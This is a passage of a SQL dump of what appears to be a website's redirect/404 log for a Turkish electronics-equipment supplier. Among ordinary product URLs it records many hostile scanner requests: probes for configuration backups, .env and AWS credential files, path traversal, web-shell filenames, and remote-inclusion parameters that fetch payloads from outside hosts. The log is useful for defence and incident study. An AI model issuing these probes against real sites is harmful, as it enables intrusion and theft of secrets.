05:29:55','0000-00-00 00:00:00',301),(27494,'https://3s-technologies.com.tr/tr/?itemid=429',NULL,'','',49,0,'2021-05-23 19:24:59','0000-00-00 00:00:00',301),(27495,'http://3s-technologies.com.tr/tr//configuration.php.1',NULL,'','',1,0,'2021-05-24 20:41:52','0000-00-00 00:00:00',301),(27496,'http://3s-technologies.com.tr/tr//configuration.php.2',NULL,'','',1,0,'2021-05-24 20:41:53','0000-00-00 00:00:00',301),(27497,'http://3s-technologies.com.tr/tr//configuration.php.3',NULL,'','',1,0,'2021-05-24 20:41:55','0000-00-00 00:00:00',301),(27498,'http://3s-technologies.com.tr/tr//configuration.php-original',NULL,'','',1,0,'2021-05-24 20:41:56','0000-00-00 00:00:00',301),(27499,'http://3s-technologies.com.tr/tr//configuration.php.save',NULL,'','',1,0,'2021-05-24 20:41:57','0000-00-00 00:00:00',301),(27500,'http://3s-technologies.com.tr/tr//configuration.php.old',NULL,'','',1,0,'2021-05-24 20:41:59','0000-00-00 00:00:00',301),(27501,'http://3s-technologies.com.tr/tr//configuration.php-backup',NULL,'','',1,0,'2021-05-24 20:42:00','0000-00-00 00:00:00',301),(27502,'http://3s-technologies.com.tr/tr//configuration.php-backup.txt',NULL,'','',1,0,'2021-05-24 20:42:03','0000-00-00 00:00:00',301),(27503,'https://3s-technologies.com.tr/index.php/en/products',NULL,'','',8,0,'2021-05-27 00:32:31','0000-00-00 00:00:00',301),(27504,'https://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/avf-detail',NULL,'','',7,0,'2021-05-27 00:49:10','0000-00-00 00:00:00',301),(27505,'http://www.3s-technologies.com.tr/en/component/',NULL,'','',2,0,'2021-05-27 14:14:37','0000-00-00 00:00:00',301),(27506,'http://www.3s-technologies.com.tr/tr/wp-includes/css/buttons.css',NULL,'','',1,0,'2021-05-29 11:08:28','0000-00-00 00:00:00',301),(27507,'http://3s-technologies.com.tr/tr/mail/config-v1.1.xml?emailaddress=admin@3s-technologies.com.tr',NULL,'','',2,0,'2021-05-29 13:25:52','0000-00-00 00:00:00',301),(27508,'http://3s-technologies.com.tr/tr/autodiscover/autodiscover.xml',NULL,'','',2,0,'2021-05-29 13:25:53','0000-00-00 00:00:00',301),(27509,'https://3s-technologies.com.tr/tr/administrator/',NULL,'','',1,0,'2021-05-29 18:04:11','0000-00-00 00:00:00',301),(27510,'https://3s-technologies.com.tr/tr/blog/wp-login.php',NULL,'','',2,0,'2021-05-29 18:04:11','0000-00-00 00:00:00',301),(27511,'https://3s-technologies.com.tr/tr/blog/',NULL,'','',1,0,'2021-05-29 18:04:11','0000-00-00 00:00:00',301),(27512,'https://3s-technologies.com.tr/tr/user/',NULL,'','',1,0,'2021-05-29 18:04:12','0000-00-00 00:00:00',301),(27513,'https://3s-technologies.com.tr/tr/admin/',NULL,'','',1,0,'2021-05-29 18:04:12','0000-00-00 00:00:00',301),(27514,'https://3s-technologies.com.tr/tr/user/login/',NULL,'','',1,0,'2021-05-29 18:04:12','0000-00-00 00:00:00',301),(27515,'https://3s-technologies.com.tr/tr/admin.php',NULL,'','',10,0,'2021-05-29 18:04:13','0000-00-00 00:00:00',301),(27516,'https://3s-technologies.com.tr/tr/admin/index.php',NULL,'','',1,0,'2021-05-29 18:04:13','0000-00-00 00:00:00',301),(27517,'https://3s-technologies.com.tr/tr/admin/users/login_do/',NULL,'','',1,0,'2021-05-29 18:04:14','0000-00-00 00:00:00',301),(27518,'https://3s-technologies.com.tr/tr/manager/',NULL,'','',1,0,'2021-05-29 18:04:14','0000-00-00 00:00:00',301),(27519,'https://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-detail',NULL,'','',2,0,'2021-05-31 04:44:43','0000-00-00 00:00:00',301),(27520,'http://www.3s-technologies.com.tr/tr/vendor/phpunit/phpunit/license',NULL,'','',1,0,'2021-05-31 17:33:50','0000-00-00 00:00:00',301),(27521,'https://3s-technologies.com.tr/en/aluminyum-iåÿleme-aluminum-processing',NULL,'','',3,0,'2021-06-01 15:46:59','0000-00-00 00:00:00',301),(27522,'http://3s-technologies.com.tr/tr//.env',NULL,'','',2,0,'2021-06-01 23:59:22','0000-00-00 00:00:00',301),(27523,'https://3s-technologies.com.tr/en/blog',NULL,'','',3,0,'2021-06-02 00:07:47','0000-00-00 00:00:00',301),(27524,'http://3s-technologies.com.tr/tr/admin/assets/plugins/jquery-file-upload/server/php/',NULL,'http://3s-technologies.com.tr/tr/admin/assets/plugins/jquery-file-upload/server/php/','',1,0,'2021-06-03 17:52:24','0000-00-00 00:00:00',301),(27525,'http://3s-technologies.com.tr/tr/assets/plugins/jquery-file-upload/server/php/',NULL,'http://3s-technologies.com.tr/tr/assets/plugins/jquery-file-upload/server/php/','',1,0,'2021-06-03 18:29:06','0000-00-00 00:00:00',301),(27526,'http://3s-technologies.com.tr/tr/admin/assets/global/plugins/jquery-file-upload/server/php/',NULL,'http://3s-technologies.com.tr/tr/admin/assets/global/plugins/jquery-file-upload/server/php/','',1,0,'2021-06-03 18:31:01','0000-00-00 00:00:00',301),(27527,'https://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/rl132-detail',NULL,'','',10,0,'2021-06-03 20:30:32','0000-00-00 00:00:00',301),(27528,'http://3s-technologies.com.tr/en/admin/assets/plugins/jquery-file-upload/server/php',NULL,'http://3s-technologies.com.tr/admin/assets/plugins/jquery-file-upload/server/php/','',1,0,'2021-06-04 00:55:13','0000-00-00 00:00:00',301),(27529,'http://3s-technologies.com.tr/en/assets/plugins/jquery-file-upload/server/php',NULL,'http://3s-technologies.com.tr/assets/plugins/jquery-file-upload/server/php/','',1,0,'2021-06-04 01:52:28','0000-00-00 00:00:00',301),(27530,'http://3s-technologies.com.tr/en/admin/assets/global/plugins/jquery-file-upload/server/php',NULL,'http://3s-technologies.com.tr/admin/assets/global/plugins/jquery-file-upload/server/php/','',1,0,'2021-06-04 02:09:51','0000-00-00 00:00:00',301),(27531,'https://www.3s-technologies.com.tr/en/en/about-us',NULL,'','',4,0,'2021-06-04 05:19:54','0000-00-00 00:00:00',301),(27532,'http://3s-technologies.com.tr/tr/class-wp-widget-archives.php',NULL,'http://3s-technologies.com.tr/class-wp-widget-archives.php','',11,0,'2021-06-07 08:18:19','0000-00-00 00:00:00',301),(27533,'http://3s-technologies.com.tr/tr/images/stories/ok.php',NULL,'http://3s-technologies.com.tr/images/stories/ok.php','',2,0,'2021-06-07 19:04:14','0000-00-00 00:00:00',301),(27534,'http://3s-technologies.com.tr/en/semalt.com',NULL,'','',5,0,'2021-06-07 19:55:45','0000-00-00 00:00:00',301),(27535,'http://3s-technologies.com.tr/tr/images/tmp.php',NULL,'http://3s-technologies.com.tr/images/tmp.php','',1,0,'2021-06-08 00:36:05','0000-00-00 00:00:00',301),(27536,'http://3s-technologies.com.tr/tr/fm.php',NULL,'','',243,0,'2021-06-08 02:18:59','0000-00-00 00:00:00',301),(27537,'http://3s-technologies.com.tr/tr/mysql/',NULL,'','',1,0,'2021-06-08 10:00:28','0000-00-00 00:00:00',301),(27538,'http://3s-technologies.com.tr/tr/db/',NULL,'','',1,0,'2021-06-08 10:00:29','0000-00-00 00:00:00',301),(27539,'http://3s-technologies.com.tr/tr/database/',NULL,'','',1,0,'2021-06-08 10:00:30','0000-00-00 00:00:00',301),(27540,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/images/slideshow/00-center-comp-1-640x377.png',NULL,'','',5,0,'2021-06-08 16:41:45','0000-00-00 00:00:00',301),(27541,'https://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/spartan-8s-8d-44-detail',NULL,'','',21,0,'2021-06-09 07:26:58','0000-00-00 00:00:00',301),(27542,'http://3s-technologies.com.tr/tr/images/dized.txt',NULL,'','',1,0,'2021-06-11 07:01:55','0000-00-00 00:00:00',301),(27543,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products-en',NULL,'','',5,0,'2021-06-11 16:00:55','0000-00-00 00:00:00',301),(27544,'http://3s-technologies.com.tr/tr/2021/wp-admin/setup-config.php',NULL,'','',1,0,'2021-06-11 16:40:53','0000-00-00 00:00:00',301),(27545,'http://3s-technologies.com.tr/tr/2020/wp-admin/setup-config.php',NULL,'','',1,0,'2021-06-11 16:47:25','0000-00-00 00:00:00',301),(27546,'http://3s-technologies.com.tr/tr/2017/wp-admin/setup-config.php',NULL,'','',1,0,'2021-06-11 16:51:45','0000-00-00 00:00:00',301),(27547,'http://3s-technologies.com.tr/tr/2018/wp-admin/setup-config.php',NULL,'','',1,0,'2021-06-11 16:59:19','0000-00-00 00:00:00',301),(27548,'http://3s-technologies.com.tr/tr/2019/wp-admin/setup-config.php',NULL,'','',1,0,'2021-06-11 17:05:08','0000-00-00 00:00:00',301),(27549,'http://3s-technologies.com.tr/tr/new2/wp-admin/setup-config.php',NULL,'','',1,0,'2021-06-11 18:12:39','0000-00-00 00:00:00',301),(27550,'http://3s-technologies.com.tr/tr/press/wp-admin/setup-config.php',NULL,'','',1,0,'2021-06-11 18:43:20','0000-00-00 00:00:00',301),(27551,'http://3s-technologies.com.tr/tr/news/wp-admin/setup-config.php',NULL,'','',1,0,'2021-06-11 18:52:02','0000-00-00 00:00:00',301),(27552,'http://3s-technologies.com.tr/tr/wp/beta/wp-admin/setup-config.php',NULL,'','',1,0,'2021-06-11 19:40:52','0000-00-00 00:00:00',301),(27553,'http://3s-technologies.com.tr/en/admin.php',NULL,'www.google.com','',252,0,'2021-06-15 00:29:54','0000-00-00 00:00:00',301),(27554,'https://3s-technologies.com.tr/en/admin.php',NULL,'www.google.com','',17,0,'2021-06-15 00:30:40','0000-00-00 00:00:00',301),(27555,'http://3s-technologies.com.tr/tr/assets/jquery-file-upload/server/php/',NULL,'http://3s-technologies.com.tr/tr/assets/jquery-file-upload/server/php/','',1,0,'2021-06-15 08:11:35','0000-00-00 00:00:00',301),(27556,'http://3s-technologies.com.tr/tr/theme/assets/global/plugins/jquery-file-upload/server/php/',NULL,'http://3s-technologies.com.tr/tr/theme/assets/global/plugins/jquery-file-upload/server/php/','',1,0,'2021-06-15 08:47:17','0000-00-00 00:00:00',301),(27557,'http://3s-technologies.com.tr/tr/templates/default/jquery-file-upload/server/php/',NULL,'http://3s-technologies.com.tr/tr/templates/default/jQuery-File-Upload/server/php/','',1,0,'2021-06-15 08:48:02','0000-00-00 00:00:00',301),(27558,'http://3s-technologies.com.tr/tr/admin/jquery-file-upload/server/php/',NULL,'http://3s-technologies.com.tr/tr/admin/jQuery-File-Upload/server/php/','',1,0,'2021-06-15 08:55:34','0000-00-00 00:00:00',301),(27559,'http://3s-technologies.com.tr/en/plugins/content/s5_media_player/helper.php?fileurl=../../../configuration.php',NULL,'','',1,0,'2021-06-17 14:49:33','0000-00-00 00:00:00',301),(27560,'http://3s-technologies.com.tr/tr/js/jquery-file-upload-8.8.5/server/php/',NULL,'http://3s-technologies.com.tr/tr/js/jquery-file-upload-8.8.5/server/php/','',1,0,'2021-06-18 22:25:00','0000-00-00 00:00:00',301),(27561,'http://3s-technologies.com.tr/en/js/jquery-file-upload-8.8.5/server/php',NULL,'http://3s-technologies.com.tr/js/jquery-file-upload-8.8.5/server/php/','',1,0,'2021-06-19 04:57:59','0000-00-00 00:00:00',301),(27562,'http://3s-technologies.com.tr/admin/index.php?route=common/login',NULL,'','',158,0,'2021-06-19 17:21:56','0000-00-00 00:00:00',301),(27563,'http://3s-technologies.com.tr/en/configuration.php.swp',NULL,'','',1,0,'2021-06-21 01:15:32','0000-00-00 00:00:00',301),(27564,'http://3s-technologies.com.tr/en/wp-includes',NULL,'www.google.com','',56,0,'2021-06-21 02:56:10','0000-00-00 00:00:00',301),(27565,'http://3s-technologies.com.tr/tr/sites/all/libraries/elfinder/elfinder.php.html',NULL,'http://3s-technologies.com.tr/tr/sites/all/libraries/elfinder/elfinder.php.html','',3,0,'2021-06-24 04:43:18','0000-00-00 00:00:00',301),(27566,'http://3s-technologies.com.tr/tr/sites/all/libraries/elfinder/elfinder.html',NULL,'http://3s-technologies.com.tr/tr/sites/all/libraries/elfinder/elfinder.html','',14,0,'2021-06-24 12:44:28','0000-00-00 00:00:00',301),(27567,'http://3s-technologies.com.tr/en/sites/all/libraries/elfinder/elfinder.php.html',NULL,'http://3s-technologies.com.tr/sites/all/libraries/elfinder/elfinder.php.html','',1,0,'2021-06-24 14:07:31','0000-00-00 00:00:00',301),(27568,'http://3s-technologies.com.tr/en/sites/all/libraries/elfinder/elfinder.html',NULL,'http://3s-technologies.com.tr/sites/all/libraries/elfinder/elfinder.html','',1,0,'2021-06-24 23:56:41','0000-00-00 00:00:00',301),(27569,'http://3s-technologies.com.tr/tr/images/slideshow/00-center-comp-1-640x377.png',NULL,'','',25,0,'2021-06-25 22:45:34','0000-00-00 00:00:00',301),(27570,'https://3s-technologies.com.tr/tr/github.com/joomla',NULL,'','',42,0,'2021-06-26 06:59:40','0000-00-00 00:00:00',301),(27571,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer',NULL,'','',20,0,'2021-06-27 15:47:33','0000-00-00 00:00:00',301),(27572,'https://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/rh2-20-detail',NULL,'','',20,0,'2021-06-28 07:57:54','0000-00-00 00:00:00',301),(27573,'https://3s-technologies.com.tr/index.php/en/products/tel-lehim/245-sn63pb37-0.8mm-detail',NULL,'','',24,0,'2021-07-01 10:21:09','0000-00-00 00:00:00',301),(27574,'https://3s-technologies.com.tr/api/v4/ci/lint',NULL,'','',4,0,'2021-07-01 17:18:42','0000-00-00 00:00:00',301),(27575,'https://3s-technologies.com.tr/api/v4/ci/lint',NULL,'','',1,0,'2021-07-01 17:18:42','0000-00-00 00:00:00',301),(27576,'https://3s-technologies.com.tr/api/v4/ci/lint',NULL,'','',1,0,'2021-07-01 17:18:42','0000-00-00 00:00:00',301),(27577,'https://3s-technologies.com.tr/index.php/en/products/manufacturers/kester',NULL,'','',20,0,'2021-07-05 02:10:30','0000-00-00 00:00:00',301),(27578,'https://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/rh6-detail',NULL,'','',2,0,'2021-07-05 15:51:24','0000-00-00 00:00:00',301),(27579,'https://3s-technologies.com.tr/en/component/k2/item/1?start=1',NULL,'http://3s-technologies.com.tr/index.php/component/k2/item/1?start=1','',1,0,'2021-07-07 14:47:09','0000-00-00 00:00:00',301),(27580,'http://www.3s-technologies.com.tr/en/tr/iletisim',NULL,'http://www.3s-technologies.com.tr/tr/iletisim','',11,0,'2021-07-07 18:52:19','0000-00-00 00:00:00',301),(27581,'http://3s-technologies.com.tr/en/administrator/help/image.php',NULL,'','',1,0,'2021-07-08 12:07:52','0000-00-00 00:00:00',301),(27582,'http://www.3s-technologies.com.tr/en/xmlrpc.php',NULL,'','',9,0,'2021-07-08 19:45:17','0000-00-00 00:00:00',301),(27583,'https://www.3s-technologies.com.tr/en/xmlrpc.php',NULL,'','',10,0,'2021-07-08 19:45:17','0000-00-00 00:00:00',301),(27584,'https://3s-technologies.com.tr/tr/akrilik-iåÿleme-acrylic-processing',NULL,'','',10,0,'2021-07-09 16:30:14','0000-00-00 00:00:00',301),(27585,'http://3s-technologies.com.tr/tr/backups/wp-admin',NULL,'http://3s-technologies.com.tr/','',1,0,'2021-07-10 05:18:21','0000-00-00 00:00:00',301),(27586,'http://3s-technologies.com.tr/tr/bkp/wp-admin',NULL,'http://3s-technologies.com.tr/','',1,0,'2021-07-10 05:18:45','0000-00-00 00:00:00',301),(27587,'http://3s-technologies.com.tr/tr/beta/wp-admin',NULL,'http://3s-technologies.com.tr/','',1,0,'2021-07-10 05:18:55','0000-00-00 00:00:00',301),(27588,'https://3s-technologies.com.tr/tr/ahåÿap-iåÿleme-wood-processing-120cm',NULL,'','',9,0,'2021-07-10 12:11:33','0000-00-00 00:00:00',301),(27589,'https://3s-technologies.com.tr/tr/aluminyum-iåÿleme-aluminum-processing',NULL,'','',13,0,'2021-07-10 22:05:35','0000-00-00 00:00:00',301),(27590,'http://3s-technologies.com.tr/tr/wp-includes/js/tw-sack.js',NULL,'','',1,0,'2021-07-14 11:03:01','0000-00-00 00:00:00',301),(27591,'http://mail.3s-technologies.com.tr/tr/administrator/index.php',NULL,'','',4,0,'2021-07-16 04:16:38','0000-00-00 00:00:00',301),(27592,'https://3s-technologies.com.tr/en/wp-login.php',NULL,'','',234,0,'2021-07-20 10:35:20','0000-00-00 00:00:00',301),(27593,'http://3s-technologies.com.tr/en/style.php',NULL,'anonymousfox.co','',56,0,'2021-07-23 13:47:27','0000-00-00 00:00:00',301),(27594,'http://3s-technologies.com.tr/en/moduless.php',NULL,'anonymousfox.co','',29,0,'2021-07-23 13:47:44','0000-00-00 00:00:00',301),(27595,'http://3s-technologies.com.tr/en/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello',NULL,'anonymousfox.co','',15,0,'2021-07-23 13:48:04','0000-00-00 00:00:00',301),(27596,'http://3s-technologies.com.tr/en/boom.php?x',NULL,'anonymousfox.co','',14,0,'2021-07-23 13:49:22','0000-00-00 00:00:00',301),(27597,'http://3s-technologies.com.tr/en/wp-content/plugins/backup_index.php',NULL,'anonymousfox.co','',29,0,'2021-07-23 13:49:44','0000-00-00 00:00:00',301),(27598,'http://3s-technologies.com.tr/en/wp-content/db_cache.php',NULL,'anonymousfox.co','',14,0,'2021-07-23 13:50:01','0000-00-00 00:00:00',301),(27599,'http://3s-technologies.com.tr/en/xmlrp.php?url=https://rentry.co/yu8xc/raw',NULL,'anonymousfox.co','',1,0,'2021-07-23 13:50:40','0000-00-00 00:00:00',301),(27600,'http://3s-technologies.com.tr/en/wpindex.php?idb=https://rentry.co/yu8xc/raw',NULL,'anonymousfox.co','',1,0,'2021-07-23 13:51:02','0000-00-00 00:00:00',301),(27601,'http://3s-technologies.com.tr/en/larva.php?idb=https://rentry.co/yu8xc/raw',NULL,'anonymousfox.co','',1,0,'2021-07-23 13:51:20','0000-00-00 00:00:00',301),(27602,'http://3s-technologies.com.tr/en/th3_err0r.php?php=https://rentry.co/yu8xc/raw',NULL,'anonymousfox.co','',1,0,'2021-07-23 13:51:39','0000-00-00 00:00:00',301),(27603,'http://3s-technologies.com.tr/en/alfindex.php',NULL,'anonymousfox.co','',14,0,'2021-07-23 13:51:59','0000-00-00 00:00:00',301),(27604,'http://3s-technologies.com.tr/en/alfa.php',NULL,'anonymousfox.co','',155,0,'2021-07-23 13:52:16','0000-00-00 00:00:00',301),(27605,'http://3s-technologies.com.tr/en/wp-booking.php',NULL,'anonymousfox.co','',26,0,'2021-07-23 13:52:32','0000-00-00 00:00:00',301),(27606,'http://3s-technologies.com.tr/en/cindex.php',NULL,'anonymousfox.co','',14,0,'2021-07-23 13:52:51','0000-00-00 00:00:00',301),(27607,'http://3s-technologies.com.tr/en/wp-content/wp-1ogin_bak.php',NULL,'anonymousfox.co','',14,0,'2021-07-23 13:53:10','0000-00-00 00:00:00',301),(27608,'http://3s-technologies.com.tr/en/wp-1ogin_bak.php',NULL,'anonymousfox.co','',14,0,'2021-07-23 13:53:32','0000-00-00 00:00:00',301),(27609,'http://3s-technologies.com.tr/en/wp-includes/fonts/css.php',NULL,'anonymousfox.co','',14,0,'2021-07-23 13:53:53','0000-00-00 00:00:00',301),(27610,'http://3s-technologies.com.tr/en/wp-includes/css/css.php',NULL,'anonymousfox.co','',30,0,'2021-07-23 13:54:15','0000-00-00 00:00:00',301),(27611,'http://3s-technologies.com.tr/en/old-index.php',NULL,'anonymousfox.co','',39,0,'2021-07-23 13:54:37','0000-00-00 00:00:00',301),(27612,'http://3s-technologies.com.tr/en/config.bak.php',NULL,'anonymousfox.co','',28,0,'2021-07-23 13:54:54','0000-00-00 00:00:00',301),(27613,'http://3s-technologies.com.tr/en/wp-admin/config.bak.php',NULL,'anonymousfox.co','',14,0,'2021-07-23 13:55:13','0000-00-00 00:00:00',301),(27614,'http://3s-technologies.com.tr/en/wp-content/config.bak.php',NULL,'anonymousfox.co','',14,0,'2021-07-23 13:55:38','0000-00-00 00:00:00',301),(27615,'http://3s-technologies.com.tr/en/wp-includes/config.bak.php',NULL,'anonymousfox.co','',14,0,'2021-07-23 13:55:52','0000-00-00 00:00:00',301),(27616,'http://3s-technologies.com.tr/en/wp-content/themes/config.bak.php',NULL,'anonymousfox.co','',29,0,'2021-07-23 13:56:10','0000-00-00 00:00:00',301),(27617,'http://3s-technologies.com.tr/en/wp-content/plugins/config.bak.php',NULL,'anonymousfox.co','',15,0,'2021-07-23 13:56:27','0000-00-00 00:00:00',301),(27618,'https://3s-technologies.com.tr/wp-includes/css/wp-config.php',NULL,'anonymousfox.co','',13,0,'2021-07-23 13:56:40','0000-00-00 00:00:00',301),(27619,'http://3s-technologies.com.tr/en/wp-content/plugins/ubh/up.php',NULL,'anonymousfox.co','',28,0,'2021-07-23 13:56:57','0000-00-00 00:00:00',301),(27620,'http://3s-technologies.com.tr/en/wp-includes/wpconfig.bak.php?act=sf',NULL,'anonymousfox.co','',14,0,'2021-07-23 13:57:16','0000-00-00 00:00:00',301),(27621,'http://3s-technologies.com.tr/en/wp-content/plugins/wpconfig.bak.php?act=sf',NULL,'anonymousfox.co','',26,0,'2021-07-23 13:57:34','0000-00-00 00:00:00',301),(27622,'http://3s-technologies.com.tr/en/haders.php',NULL,'anonymousfox.co','',14,0,'2021-07-23 13:57:52','0000-00-00 00:00:00',301),(27623,'http://3s-technologies.com.tr/en/wp-content/wp-old-index.php?action=login&pass=-1&submit=',NULL,'anonymousfox.co','',14,0,'2021-07-23 13:58:12','0000-00-00 00:00:00',301),(27624,'http://3s-technologies.com.tr/en/legion.php',NULL,'anonymousfox.co','',29,0,'2021-07-23 13:58:30','0000-00-00 00:00:00',301),(27625,'http://3s-technologies.com.tr/en/wp-content/mu-plugins/db-safe-mode.php',NULL,'anonymousfox.co','',29,0,'2021-07-23 13:58:48','0000-00-00 00:00:00',301),(27626,'http://3s-technologies.com.tr/en/wp-includes/lfx.php',NULL,'anonymousfox.co','',14,0,'2021-07-23 13:59:07','0000-00-00 00:00:00',301),(27627,'http://3s-technologies.com.tr/en/wp-includes/small.php',NULL,'anonymousfox.co','',14,0,'2021-07-23 13:59:25','0000-00-00 00:00:00',301),(27628,'http://3s-technologies.com.tr/en/upload.php',NULL,'anonymousfox.co','',54,0,'2021-07-23 14:00:00','0000-00-00 00:00:00',301),(27629,'http://3s-technologies.com.tr/en/config.php',NULL,'anonymousfox.co','',65,0,'2021-07-23 14:00:17','0000-00-00 00:00:00',301),(27630,'http://3s-technologies.com.tr/en/test.php?ghost=send',NULL,'anonymousfox.co','',6,0,'2021-07-23 14:00:32','0000-00-00 00:00:00',301),(27631,'http://3s-technologies.com.tr/en/wp-content/langar.php',NULL,'anonymousfox.co','',14,0,'2021-07-23 14:00:49','0000-00-00 00:00:00',301),(27632,'http://3s-technologies.com.tr/en/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'anonymousfox.co','',14,0,'2021-07-23 14:01:08','0000-00-00 00:00:00',301),(27633,'http://3s-technologies.com.tr/en/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php',NULL,'anonymousfox.co','',15,0,'2021-07-23 14:01:26','0000-00-00 00:00:00',301),(27634,'http://3s-technologies.com.tr/en/wp-content/plugins/wpdiscuz/themes/default/style-rtl.css',NULL,'anonymousfox.co','',14,0,'2021-07-23 14:01:45','0000-00-00 00:00:00',301),(27635,'http://3s-technologies.com.tr/tr/administrator/components/com_jbusinessdirectory/assets/upload.php',NULL,'','',14,0,'2021-07-26 01:46:01','0000-00-00 00:00:00',301),(27636,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/mirae',NULL,'','',12,0,'2021-07-28 12:09:39','0000-00-00 00:00:00',301),(27637,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/components/com_jevents/index.html',NULL,'','',1,0,'2021-07-29 09:48:43','0000-00-00 00:00:00',301),(27638,'https://www.3s-technologies.com.tr/en/apple-touch-icon-120x120-precomposed.png',NULL,'','',4,0,'2021-07-31 09:12:24','0000-00-00 00:00:00',301),(27639,'https://www.3s-technologies.com.tr/en/apple-touch-icon-120x120.png',NULL,'','',4,0,'2021-07-31 09:12:25','0000-00-00 00:00:00',301),(27640,'https://3s-technologies.com.tr/en/tr/iletisim',NULL,'https://3s-technologies.com.tr/tr/iletisim','',18,0,'2021-08-04 21:34:33','0000-00-00 00:00:00',301),(27641,'https://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/rh2-detail',NULL,'','',12,0,'2021-08-05 01:12:31','0000-00-00 00:00:00',301),(27642,'http://3s-technologies.com.tr/tr/_profiler/phpinfo',NULL,'','',33,0,'2021-08-05 03:27:58','0000-00-00 00:00:00',301),(27643,'http://3s-technologies.com.tr/tr/phpinfo',NULL,'','',30,0,'2021-08-05 03:28:00','0000-00-00 00:00:00',301),(27644,'http://3s-technologies.com.tr/tr/aws.yml',NULL,'','',2,0,'2021-08-05 03:28:00','0000-00-00 00:00:00',301),(27645,'http://3s-technologies.com.tr/tr/.env.bak',NULL,'','',9,0,'2021-08-05 03:28:01','0000-00-00 00:00:00',301),(27646,'http://3s-technologies.com.tr/tr/.aws/credentials',NULL,'','',31,0,'2021-08-05 03:28:02','0000-00-00 00:00:00',301),(27647,'http://3s-technologies.com.tr/tr/config/aws.yml',NULL,'','',3,0,'2021-08-05 03:28:03','0000-00-00 00:00:00',301),(27648,'http://3s-technologies.com.tr/tr/config.js',NULL,'','',3,0,'2021-08-05 03:28:04','0000-00-00 00:00:00',301),(27649,'http://www.3s-technologies.com.tr/.env',NULL,'','',2,0,'2021-08-05 17:04:19','0000-00-00 00:00:00',301),(27650,'https://3s-technologies.com.tr/index.php/tr/anasayfa2/78-turkish-tr',NULL,'','',2,0,'2021-08-06 04:38:59','0000-00-00 00:00:00',301),(27651,'http://3s-technologies.com.tr/en/wp-admin/css',NULL,'binance.com','',631,0,'2021-08-07 03:34:57','0000-00-00 00:00:00',301),(27652,'http://3s-technologies.com.tr/en/xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',13,0,'2021-08-07 09:35:31','0000-00-00 00:00:00',301),(27653,'http://3s-technologies.com.tr/en/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',13,0,'2021-08-07 09:35:49','0000-00-00 00:00:00',301),(27654,'http://3s-technologies.com.tr/en/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',13,0,'2021-08-07 09:36:06','0000-00-00 00:00:00',301),(27655,'http://3s-technologies.com.tr/en/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',13,0,'2021-08-07 09:36:24','0000-00-00 00:00:00',301),(27656,'https://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/mi-300-detail',NULL,'','',7,0,'2021-08-07 20:13:25','0000-00-00 00:00:00',301),(27657,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/tolo',NULL,'','',4,0,'2021-08-07 20:20:42','0000-00-00 00:00:00',301),(27658,'https://3s-technologies.com.tr/index.php/tr/anasayfa2/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',5,0,'2021-08-08 11:56:18','0000-00-00 00:00:00',301),(27659,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri',NULL,'','',32,0,'2021-08-08 17:26:07','0000-00-00 00:00:00',301),(27660,'http://3s-technologies.com.tr/tr/wp-content/plugins/advanced_file_manager_5/files/_elghoul.php?0=up',NULL,'','',4,0,'2021-08-10 09:02:32','0000-00-00 00:00:00',301),(27661,'https://3s-technologies.com.tr/index.php/tr/ueruenler/flux',NULL,'','',6,0,'2021-08-10 16:00:00','0000-00-00 00:00:00',301),(27662,'https://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim',NULL,'','',2,0,'2021-08-11 17:23:51','0000-00-00 00:00:00',301),(27663,'http://www.3s-technologies.com.tr/en/wood-processing-ahåÿap-iåÿleme/mdf-iåÿleme-mdf-processing',NULL,'','',4,0,'2021-08-12 06:55:23','0000-00-00 00:00:00',301),(27664,'https://www.3s-technologies.com.tr/tr/akrilik-iåÿleme-acrylic-processing',NULL,'','',6,0,'2021-08-12 14:56:16','0000-00-00 00:00:00',301),(27665,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,mf_name?language=tr-tr',NULL,'','',6,0,'2021-08-12 16:02:09','0000-00-00 00:00:00',301),(27666,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,category_name?language=tr-tr',NULL,'','',2,0,'2021-08-12 16:24:37','0000-00-00 00:00:00',301),(27667,'https://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/results,1-10?language=tr-tr',NULL,'','',2,0,'2021-08-12 18:09:35','0000-00-00 00:00:00',301),(27668,'http://3s-technologies.com.tr/tr/rte/rte_popup_file_atch.asp',NULL,'','',1,0,'2021-08-13 20:30:29','0000-00-00 00:00:00',301),(27669,'http://www.3s-technologies.com.tr/tr/joomla/images/pdf/le_benchtop_automated_pick-place.pdf',NULL,'','',1,0,'2021-08-13 23:13:00','0000-00-00 00:00:00',301),(27670,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae',NULL,'','',6,0,'2021-08-14 08:43:03','0000-00-00 